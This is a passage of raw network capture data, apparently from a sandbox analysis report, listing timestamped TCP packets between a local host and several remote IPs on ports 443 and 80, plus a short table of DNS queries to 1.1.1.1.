                                                                                                                                              Dec 19, 2024 07:52:47.596000910 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.596076965 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.596076965 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.596102953 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.596143961 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.615005970 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.615022898 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.615205050 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.615223885 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.615309000 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.637029886 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.637049913 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.637173891 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.637175083 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.637191057 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.637233019 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.657675982 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.657699108 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.657743931 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.657756090 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.657800913 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.657800913 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.721209049 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.721231937 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.721292019 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.721307993 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.721324921 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.721359968 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.752903938 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.752923012 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.753012896 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.753027916 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.753103018 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.760848999 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.760865927 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.760996103 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.761009932 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.761066914 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.769994020 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.770009995 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.770107985 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.770107985 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.770121098 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.770173073 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.778963089 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.778980970 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.779031038 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.779043913 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.779103994 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.779222965 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.786125898 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.786145926 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.786190033 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.786201954 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.786247015 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.786247015 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.794256926 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.794281960 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.794356108 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.794383049 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.794435978 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.801004887 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.801021099 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.801080942 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.801096916 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.801143885 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.810117960 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.892226934 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.892251968 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.892301083 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.892317057 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.892357111 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.892357111 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.918901920 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.918920040 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.918977022 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.918987989 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.919013977 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.919203997 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.947861910 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.947884083 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.947923899 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.947942972 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.947971106 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.947997093 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.953962088 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.953984976 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.954031944 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.954031944 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.954042912 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.954134941 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.959296942 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.959320068 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.959358931 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.959369898 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.959404945 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.959501028 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.965441942 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.965456963 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.965517044 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.965528011 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.965569973 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.971163034 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.971187115 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.971256971 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.971266031 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.971333027 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.977179050 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.977202892 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.977253914 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.977262020 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:47.977346897 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:47.977346897 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.083800077 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.083822966 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.083878040 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.083897114 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.083933115 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.083992004 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.110632896 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.110650063 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.110738039 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.110759020 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.110775948 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.110901117 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.140160084 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.140178919 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.140316963 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.140316963 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.140337944 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.140386105 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.146296978 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.146312952 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.146397114 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.146406889 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.146456957 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.151684999 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.151700020 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.151767015 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.151787996 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.151838064 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.157680035 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.157696009 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.157793999 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.157831907 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.157958031 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.163487911 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.163503885 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.163630962 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.163630962 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.163661957 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.163718939 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.165205002 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.169526100 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.169542074 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.169620037 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.169631958 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.169682026 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.189666986 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.276076078 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.276097059 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.276151896 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.276196957 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.276228905 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.276282072 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.302752018 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.302767992 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.302813053 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.302886963 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.302895069 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.302973032 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.332716942 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.332735062 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.332879066 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.332894087 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.332947969 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.338685036 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.338701963 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.338756084 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.338764906 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.338958979 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.344058037 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.344075918 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.344249964 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.344261885 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.344311953 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.350172997 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.350188017 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.350250006 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.350261927 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.350305080 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.355881929 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.355896950 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.355998993 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.355998993 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.356008053 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.356075048 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.362062931 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.362077951 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.362133026 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.362140894 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.362165928 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.362206936 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.371247053 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.468175888 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.468197107 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.468425035 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.468425035 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.468437910 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.468550920 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.495263100 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.495287895 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.495331049 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.495338917 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.495373964 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.495687962 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.524864912 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.524880886 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.525002956 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.525012970 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.525259972 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.530934095 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.530949116 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.531075954 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.531085968 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.531299114 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.536988020 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.537004948 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.537067890 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.537079096 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.537400961 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.542362928 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.542378902 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.542500019 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.542509079 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.542824030 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.548307896 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.548360109 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.548374891 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.548479080 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.548485994 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.548677921 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.554492950 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.554508924 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.554593086 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.554601908 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.554951906 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.564493895 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.682569981 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.682593107 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.682806969 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.682822943 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.683042049 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.712162971 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.712179899 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.712264061 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.712282896 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.712294102 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.712338924 CET4434972545.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:48.712346077 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.712388992 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:48.724293947 CET49725443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:53:03.368458033 CET4970480192.168.2.9199.232.214.172
                                                                                                                                              Dec 19, 2024 07:53:03.488244057 CET8049704199.232.214.172192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:03.488327980 CET4970480192.168.2.9199.232.214.172
                                                                                                                                              Dec 19, 2024 07:53:28.919289112 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:28.919328928 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:28.919403076 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:28.922470093 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:28.922486067 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:30.613477945 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:30.613799095 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:30.613821983 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:30.614152908 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:30.614558935 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:30.614618063 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:30.755572081 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:40.343044996 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:40.343139887 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:40.343215942 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:40.539118052 CET49728443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:53:40.539128065 CET44349728142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:57.943330050 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:53:58.063108921 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:53:58.063225031 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:54:28.865186930 CET49730443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:54:28.865245104 CET44349730142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:54:28.865329981 CET49730443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:54:28.865647078 CET49730443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:54:28.865662098 CET44349730142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:54:30.558661938 CET44349730142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:54:30.598570108 CET49730443192.168.2.9142.250.181.132
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 19, 2024 07:52:25.173783064 CET5992853192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:25.174007893 CET5340753192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:25.312324047 CET53607561.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:25.314878941 CET53584261.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:26.188719034 CET5043253192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:26.198293924 CET5177353192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:26.198847055 CET5742853192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:26.296144962 CET53599281.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:26.339382887 CET53517731.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:26.474509001 CET53534071.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:26.474695921 CET53574281.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:26.596384048 CET53504321.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.324136019 CET53572531.1.1.1192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.693464041 CET6371253192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:28.693583965 CET5118553192.168.2.91.1.1.1
                                                                                                                                              Dec 19, 2024 07:52:28.832722902 CET53637121.1.1.1192.168.2.9
